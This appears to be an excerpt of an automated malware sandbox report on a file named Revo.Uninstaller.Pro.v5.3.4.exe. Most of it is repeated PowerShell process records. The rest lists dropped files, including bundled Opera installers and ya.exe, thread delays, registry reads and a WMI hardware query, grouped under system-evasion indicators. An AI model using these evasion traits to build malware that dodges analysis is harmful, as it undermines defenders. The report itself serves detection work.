      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RO DAVID FISCHER AG - A COMPANY OF THE APICA GROUP5.2D540419E-F4B7-47F9-B045-3539873E2AB75.1APICA PROXYSNIFFERAPICA PROXYSNIFFER"C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER.EXE"5.2
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: APICA PROXYSNIFFERAPICA PROXYSNIFFER"C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER.EXE"5.2
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: APICA PROXYSNIFFERAPICA PROXYSNIFFER"C:\USERS\VMS\PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER.EXE"5.2
      Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2777965863.0000000007917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RO DAVID FISCHER AG - A COMPANY OF THE APICA GROUP5.218F02B1E-9ABE-4B3F-B347-A65E945826B76.1APICA PROXYSNIFFERAPICA PROXYSNIFFER"C:\USERS\VMS\PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER\UNINSTALL APICA PROXYSNIFFER.EXE"5.2
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeWindow / User API: threadDelayed 1911Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8193
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1475
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8109
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1558
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6766
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1785
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.sysJump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\System.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Opera_115.0.5322.77_Autoupdate_x64[1].exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654101308068.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654087472252.dllJump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.sysJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412091154091\opera_packageJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsyB8DA.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654075368040.dllJump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sysJump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\nsDialogs.dllJump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Uninstall.exeJump to dropped file
      Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Windows\System32\drivers\SETB88F.tmpJump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\nsExec.dllJump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.del (copy)Jump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\INetC.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsyB8DA.tmp\INetC.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654079011640.dllJump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\LangDLL.dllJump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exeJump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exeJump to dropped file
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDropped PE file which has not been started: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUnPro.exeJump to dropped file
      Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Windows\system32\DRIVERS\revoflt.sys (copy)Jump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2412091654106048056.dllJump to dropped file
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe TID: 8188Thread sleep time: -95550s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6392Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1712Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7832Thread sleep count: 6766 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6232Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7832Thread sleep count: 1785 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystemProduct
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystemProduct
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile Volume queried: C:\Program Files FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile Volume queried: C:\Program Files FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXEFile Volume queried: C:\ FullSizeInformation
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA FullSizeInformation
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA FullSizeInformation
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
